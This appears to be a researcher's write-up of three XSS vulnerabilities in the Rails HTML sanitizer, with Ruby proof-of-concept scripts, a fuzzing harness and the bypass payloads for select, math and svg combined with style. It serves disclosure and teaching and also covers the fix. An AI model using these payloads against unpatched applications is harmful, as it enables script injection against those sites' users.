A while ago I was writing an application based on the Rails framework which returned sanitized user input. Its purpose was to build a PoC for an XSS vulnerability in the Rails HTML sanitizer (CVE-2022-32209, which appeared in June 2022). The following is a short write-up of that endeavour and how it turned into the discovery of two additional CVEs.
I start with a discussion of the original CVE-2022-32209, proceed with an investigation of the fix and how it turned out to be incomplete (CVE-2022-23520), explain how that motivated additional fuzzing which uncovered additional working attack payloads (CVE-2022-23519) and conclude with a brief outline of the fix (entirely designed and implemented by flavorjones).
CVE-2022-32209: XSS when select and style tags are allowed
The Rails HTML sanitizer gives Rails developers the ability to accept user input that contains HTML and return that
HTML to (other) users, but without introducing XSS.
It does that by allowing only selected sets of HTML tags and attributes and scrubbing the rest.
As a developer, you can modify these allow lists.
Of course, you should not do anything stupid like adding script to the allow list of HTML tags.
Beyond that though, the job of the sanitizer is to work with any reasonable allow list developers come up with.
The starting point for CVE-2022-32209 is this HackerOne report.
It describes how the Rails HTML sanitizer does not work properly when both the style and select tags are allowed.
Let's write a small script to see what happens.
I’ve stored it in a file sanitize-1-4-2.rb to emphasize that the version of the Rails sanitizer is pinned to 1.4.2.
This is the code (heavily inspired by flavorjones, the author of the sanitizer, see here):
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.2"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version : " + Rails::Html::Sanitizer::VERSION
puts "Input string : " + input
puts "Allowed tags : " + tags.join(' ')

def sanitize(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

puts "Output : " + sanitize(input, tags)
The script accepts two arguments: first a string to sanitize and second a list of allowed HTML tags. Then it will print the sanitized string to your console. Run it and you see that the sanitizer does a good job of sanitizing HTML:
user@notebook:~$ ./sanitize-1-4-2.rb '<div><script>alert()</script></div> <img src=x onerror=alert()>' 'div img'
Current Version : 1.4.2
Input string : <div><script>alert()</script></div> <img src=x onerror=alert()>
Allowed tags : div img
Output : <div>alert()</div> <img src="x">
We allowed both div and img as tags and the sanitizer removed all other dangerous tags and attributes from the HTML string.
The script tag is gone and the onerror attribute of the img tag is removed too.
However, run it with the following input string while allowing the tags select and style and, surprisingly, the script tag in the input string remains exactly where it is:
user@notebook:~$ ./sanitize-1-4-2.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version : 1.4.2
Input string : <select><style><script>alert()</script></style></select>
Allowed tags : select style
Output : <select><style><script>alert()</script></style></select>
The original HackerOne report used a slightly different, malformed string as input, but it basically worked with the simple string above, as we’ve just seen.
Version 1.4.3 rolled out a fix for the vulnerability, so everything should be fine when using that version.
CVE-2022-23520: Incomplete fix for CVE-2022-32209
Now one day I was building a small application in Rails and wanted to update my sanitizer to fix CVE-2022-32209. A small change in the Gemfile was all it took. Then I tested the payload shown above to make sure the Gem was actually updated. To my surprise though, the application was still vulnerable. First I convinced myself that the problem was not me being too stupid to update a Gem, then I went off investigating what was going on here.
Code for the sanitizer lives in its own repository at github.com/rails/rails-html-sanitizer.
Looking at the recent commits, I found this one, which seemed to be the fix for CVE-2022-32209.
Basically, all it does is define a new private method remove_safelist_tag_combinations on the sanitizer, which removes style from the list of allowed tags if select is in there too.
This new method is used within another method allowed_tags, whose responsibility is to return the list of allowed tags and which is used within the sanitize method.
See the relevant code below:
module Rails
  module Html
    class SafeListSanitizer < Sanitizer
      ...
      def sanitize(html, options = {})
        ...
        elsif allowed_tags(options) || allowed_attributes(options)
          @permit_scrubber.tags = allowed_tags(options)
          ...
      end
      ...
      private
        ...
        def remove_safelist_tag_combinations(tags)
          if !loofah_using_html5? && tags.include?("select") && tags.include?("style")
            warn("WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'")
            tags.delete("style")
          end
          tags
        end

        def allowed_tags(options)
          if options[:tags]
            remove_safelist_tag_combinations(options[:tags])
          else
            self.class.allowed_tags
          end
        end
        ...
    end
  end
end
You may have noticed that the method remove_safelist_tag_combinations is applied to the allowed tags only if they are passed within the options.
If no tags are in the options, allowed_tags falls back to the class variable Rails::Html::SafeListSanitizer.allowed_tags, which contains a default value with a few harmless tags (source code).
So far so good. All of this looks solid at first sight.
When building an application in Rails, you don’t use the Gem explicitly.
Rather, it is part of the framework and “just there”.
The documentation of Rails tells you how to use it here.
In the docs you find different ways in which you can pass custom allowed tag lists.
One is to use the Rails config/application.rb and set something like config.action_view.sanitized_allowed_tags = ["select", "style"].
The allow list will then be applied globally in your application.
Another is to pass it explicitly as an option when calling the sanitizer, e.g., in your ERB templates.
It could look like this: <p>Hello <%= sanitize @name, tags: ["select", "style"] %></p>.
In this case, the allow list will be specific to this call.
When I updated my application and the fix did not work, I was using the first of the ways shown above, i.e., setting an allow list in config/application.rb.
It turned out that the way this setting works is that it overwrites the class variable Rails::Html::SafeListSanitizer.allowed_tags, which I think is exposed here in the ActionView helpers.
As we saw above, the new method remove_safelist_tag_combinations does not apply to that list (since it was mistakenly assumed to be constant?).
This means the fix does not work when setting allowed tags via config.
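The two code paths can be modelled without the Gem at all. The following is only a toy sketch under my own assumptions: ToySanitizer and effective_tags are hypothetical names, the default tag list is made up, and the loofah_using_html5? check is left out. It merely mirrors the branching of allowed_tags from the excerpt above.

```ruby
# Toy model of the 1.4.3 tag selection; ToySanitizer is a hypothetical
# stand-in and not the real Rails::Html::SafeListSanitizer.
class ToySanitizer
  class << self
    # Class-level default list; this is what the Rails config overwrites.
    attr_accessor :allowed_tags
  end
  self.allowed_tags = ["strong", "em"] # made-up default for illustration

  # Public wrapper (hypothetical) so the effective list can be inspected.
  def effective_tags(options = {})
    allowed_tags(options)
  end

  private

  # Mirrors the fix: drop "style" when it is combined with "select".
  def remove_safelist_tag_combinations(tags)
    tags = tags.dup # the toy works on a copy; the real method deletes in place
    tags.delete("style") if tags.include?("select") && tags.include?("style")
    tags
  end

  # Only the options branch passes through the filter.
  def allowed_tags(options)
    if options[:tags]
      remove_safelist_tag_combinations(options[:tags])
    else
      self.class.allowed_tags
    end
  end
end

via_options = ToySanitizer.new.effective_tags(tags: ["select", "style"])

ToySanitizer.allowed_tags = ["select", "style"]
via_class = ToySanitizer.new.effective_tags

puts "via options: #{via_options.inspect}"
puts "via class  : #{via_class.inspect}"
```

In this model the list passed as an option loses style, while the list stored at class level comes back unchanged, which is the same asymmetry I ran into with the real Gem.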
You can convince yourself of the behaviour with this simple script which I’ve named sanitize-1-4-3.rb:
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "rails-html-sanitizer"

if ARGV.length != 2
  puts "Pass 2 arguments:"
  puts " 1st the string to sanitize"
  puts " 2nd the tags you want to whitelist"
  exit
end

input = ARGV[0]
tags = ARGV[1].split(' ')

puts "Current Version : " + Rails::Html::Sanitizer::VERSION
puts "Input string : " + input
puts "Allowed tags : " + tags.join(' ')

# Pass the allow list explicitly as an option.
def sanitize_argument(input, tags)
  Rails::Html::SafeListSanitizer.new.sanitize(input, tags: tags)
end

# Overwrite the class-level allow list, as the Rails config does, then reset it.
def sanitize_class_variable(input, tags)
  Rails::Html::SafeListSanitizer.allowed_tags = tags
  output = Rails::Html::SafeListSanitizer.new.sanitize(input)
  Rails::Html::SafeListSanitizer.allowed_tags = nil
  output
end

puts "Output (class variable) : " + sanitize_class_variable(input, tags)
puts "Output (argument) : " + sanitize_argument(input, tags)
Run it and you get an output as shown below. As you can see, the string is properly sanitized when passing the allow list in the options but not sanitized when the class variable is overwritten:
user@notebook:~$ ./sanitize-1-4-3.rb '<select><style><script>alert()</script></style></select>' 'select style'
Current Version : 1.4.3
Input string : <select><style><script>alert()</script></style></select>
Allowed tags : select style
Output (class variable) : <select><style><script>alert()</script></style></select>
WARNING: Rails::Html::SafeListSanitizer: removing 'style' from safelist, should not be combined with 'select'
Output (argument) : <select><script>alert()</script></select>
This was reported at HackerOne here and disclosed as CVE-2022-23520 and GHSA-rrfc-7g8p-99q8.
CVE-2022-23519: More XSS for math+style and svg+style
A reader with an eye for details may have noticed something strange about the fix.
The method remove_safelist_tag_combinations removes style from the allow list only if three conditions are met:
- style is in the list: makes perfect sense, remove style only if it is there
- select is in the list: also makes sense, the combination was the problem
- !loofah_using_html5?: this reads like “only if we are not using an HTML5 parser”
The third condition raises some suspicion.
Could it be that the Rails sanitizer does not use an HTML5-compliant parser?
If the parser of the sanitizer is different from the parser of your browser, then there could be a lot more problems than just the select and style tag combination.
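To make the narrowness of the guard concrete, it can be restated as a standalone predicate. This is only a sketch: style_removed? and its using_html5 keyword are hypothetical names standing in for the condition inside remove_safelist_tag_combinations and for loofah_using_html5?.

```ruby
# Hypothetical restatement of the guard in remove_safelist_tag_combinations.
# using_html5 stands in for the result of loofah_using_html5?.
def style_removed?(tags, using_html5:)
  !using_html5 && tags.include?("select") && tags.include?("style")
end

puts style_removed?(%w[select style], using_html5: false) # true
puts style_removed?(%w[select style], using_html5: true)  # false
puts style_removed?(%w[math style], using_html5: false)   # false
```

Any combination other than select plus style passes through untouched, so whether other pairs are safe depends entirely on how the parser treats them.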
To test, I wrote a small fuzzing script named fuzz-1-4-3.rb that would test a few hand-picked XSS payloads wrapped into all possible combinations of two HTML tags against the sanitizer.
It looked like this:
#! /usr/bin/env ruby
require "bundler/inline"
require 'bundler'
require "cgi" # CGI::escapeHTML is used in render below

Bundler.configure_gem_home_and_path ".cache/bundler"

gemfile do
  source "https://rubygems.org"
  gem "rails-html-sanitizer", "=1.4.3"
end

require "rails-html-sanitizer"

puts "[+] Current Version : " + Rails::Html::Sanitizer::VERSION

# Write test file number i; once loaded, the page navigates to file i+1.
def render(i, sanitized, wrapped_payload)
  html = <<-EOF
    <html>
    <head>
    <script>
    function next() {
      window.location = "file:///tmp/www/file#{i+1}.html";
    }
    </script>
    </head>
    <body onload=next()>
    #{CGI::escapeHTML(wrapped_payload)}
    #{sanitized}
    </body>
    </html>
  EOF
  File.write("/tmp/www/file#{i}.html", html)
  sanitized
end

# Wrap a payload into two tags.
def wrap(tag1, tag2, payload)
  "<#{tag1}><#{tag2}>#{payload}</#{tag1}></#{tag2}>"
end

# Sanitize a string while allowing exactly the two given tags.
def sanitize(tag1, tag2, s)
  Rails::Html::SafeListSanitizer.new.sanitize s, tags: [tag1, tag2]
end

html_tags = File.readlines("html-tags.txt", chomp: true)

# Each payload maps to the indicator strings that must survive sanitization.
payloads = {
  "<script>alert()</script>" => ["<script>"],
  "<img src=x onerror=alert()>" => ["onerror", "alert"],
}

i = 0
puts "[+] Generating test files..."
html_tags.each do |tag1|
  html_tags.each do |tag2|
    payloads.each do |payload, indicators|
      wrapped_payload = wrap(tag1, tag2, payload)
      sanitized = sanitize(tag1, tag2, wrapped_payload)
      if indicators.all? { |indicator| sanitized.include? indicator }
        render(i, sanitized, wrapped_payload)
        puts "- Rendered #{i} (allowed tags [#{tag1} #{tag2}]): #{sanitized}"
        i += 1
      end
    end
  end
end
A few explanations.
The function render writes numbered HTML test files into /tmp/www/ (numbering should be consecutive, starting at 0).
You pass sanitized, which is the previously sanitized string that is embedded in the HTML body.
You also pass wrapped_payload, which is rendered to the HTML body in HTML-escaped form (just so you can later see what the payload was).
The HTML header contains a script which changes the location to the next test file once the body has finished loading (e.g., it navigates to /tmp/www/file1.html if the current file is /tmp/www/file0.html).
The idea is that the browser will later navigate from file to file, either until it reaches the end or until one of the sanitized XSS payloads triggers alert(), which stops the process.
The next functions are wrap, which wraps a payload into two tags tag1 and tag2, and sanitize, which applies sanitization on a string while allowing tag1 and tag2.
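For reference, this is what wrap produces for one tag pair. The function body is copied from the fuzzing script so that the snippet runs on its own; the choice of math and style as example tags is mine.

```ruby
# Same one-liner as in the fuzzing script, repeated so this snippet is standalone.
def wrap(tag1, tag2, payload)
  "<#{tag1}><#{tag2}>#{payload}</#{tag1}></#{tag2}>"
end

wrapped = wrap("math", "style", "<img src=x onerror=alert()>")
puts wrapped
# prints: <math><style><img src=x onerror=alert()></math></style>
```

Note that the closing tags are emitted in the same order as the opening ones, so the fuzzing input is mis-nested markup rather than well-formed HTML.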
The script also relies on a file html-tags.txt from which it reads the wordlist of HTML tags.
Mine was compiled from various places and had 136 entries.
Find it here.
Next, I’ve defined a Ruby hash called payloads with two simple XSS payloads, each accompanied by a list of strings I call indicators.
The idea is to only render test files when the indicator strings are present, to avoid rendering files that are unlikely to execute the payload.
Finally, at the bottom of the script, nested loops run through the list of tags and payloads, sanitize the wrapped payload and render the test file if all indicators are present.
Note that I pass the allow list as an option to sanitize to avoid getting hits for the known combination of select and style.
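The indicator check can be looked at in isolation. In this sketch, worth_rendering? and sanitizer_calls are hypothetical helper names of mine; the payloads hash is the one from the script, and the two sample strings are the sanitizer outputs shown earlier in this post.

```ruby
# Payloads and indicators as in the fuzzing script.
PAYLOADS = {
  "<script>alert()</script>" => ["<script>"],
  "<img src=x onerror=alert()>" => ["onerror", "alert"],
}.freeze

# True when every indicator string survived sanitization (hypothetical helper).
def worth_rendering?(sanitized, indicators)
  indicators.all? { |indicator| sanitized.include?(indicator) }
end

# Number of sanitizer calls: every ordered tag pair, once per payload.
def sanitizer_calls(tag_count, payload_count)
  tag_count * tag_count * payload_count
end

neutralized = '<div>alert()</div> <img src="x">'
untouched = "<select><style><script>alert()</script></style></select>"

puts worth_rendering?(neutralized, PAYLOADS["<img src=x onerror=alert()>"]) # false
puts worth_rendering?(untouched, PAYLOADS["<script>alert()</script>"])     # true
puts sanitizer_calls(136, PAYLOADS.size)                                    # 36992
```

With 136 tags and two payloads the loops make 36992 sanitizer calls, so filtering on indicators keeps the number of files the browser has to walk through manageable.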
Ensure html-tags.txt exists in the current directory, /tmp/www/ exists and is empty, and then run the script with ./fuzz-1-4-3.rb to generate 536 test files.
Then open a browser.
I’ve used chromium --disable-ipc-flooding-protection.
Without the argument it may stop navigating to the next file after a while.
In the browser, navigate to file:///tmp/www/file0.html now, then watch.
After a short while, you should see an alert dialog for “file163.html”, which contains the wrapped payload <math><style><img src=x onerror=alert()></math></style></math>.
Keep going and you will get two more hits for “file498.html” and “file499.html”.
In the end, all of them are due to the following two combinations of tags, which allow for XSS just like the combination select and style did:
- math and style: works for a payload like <math><style><img src=x onerror=alert()></math></style></math>, which the sanitizer will not change
- svg and style: works for both payloads <svg><style><script>alert()</script></svg></style></svg> and <svg><style><img src=x onerror=alert()></svg></style></svg>
This was reported at HackerOne here and disclosed as CVE-2022-23519 and GHSA-9h9g-93gc-623h.
The underlying problem and its current fix
If you really want to know what is going on under the hood then stop reading this and go to these decision notes instead. You will find a very extensive and detailed analysis of these and other related CVEs there (note that the repository is github.com/flavorjones/loofah, which is the actual implementation of the Rails HTML sanitizer).
The short summary of this analysis: the problem is indeed the use of an HTML4 parser.
An HTML4 DOM seems to treat the contents of style tags as CDATA which needs no escaping or sanitization.
In an HTML5 DOM however everything inside math and svg tags is “foreign content” and special parsing rules apply.
For example, for the case of <math><style><img src=x onerror=alert()></math></style></math>, an HTML5 parser seems to treat the img tag within math and style as an error and repairs the DOM for you by moving it out (as described here).
The fix this time appears to be this commit, which is an implementation of solution two presented in the decision notes. Effectively it now escapes everything the HTML4 parser parses as CDATA.
You can convince yourself by building a test script like those shown above, but for version 1.4.4 of the Gem.
Run it and you see that the characters <, > and & are escaped now:
user@notebook:~$ ./sanitize-1-4-4.rb '<math><style><img src=x onerror=alert()></math></style></math>' 'math style'
Current Version : 1.4.4
Input string : <math><style><img src=x onerror=alert()></math></style></math>
Allowed tags : math style
Output : <math><style>&lt;img src=x onerror=alert()&gt;&lt;/math&gt;</style></math>
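The effect of that escaping can be sketched in a few lines of plain Ruby. This is not Loofah's code: escape_cdata and ESCAPES are hypothetical names, and the snippet only shows what escaping the three characters does to a payload string.

```ruby
# Hypothetical helper, not Loofah's implementation: escape the three
# characters mentioned above so the text can no longer be parsed as markup.
ESCAPES = { "&" => "&amp;", "<" => "&lt;", ">" => "&gt;" }.freeze

def escape_cdata(text)
  text.gsub(/[&<>]/, ESCAPES)
end

puts escape_cdata("<img src=x onerror=alert()>")
# prints: &lt;img src=x onerror=alert()&gt;
```

Once the angle brackets are gone, a browser with an HTML5 parser has nothing left to lift out of the style element as a tag.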
Moreover, if you re-run the fuzzing script with the Gem version bumped to 1.4.4, you still get 269 test files but none of them hit anymore.
Thus, it looks to me as if this particular issue is finally gone.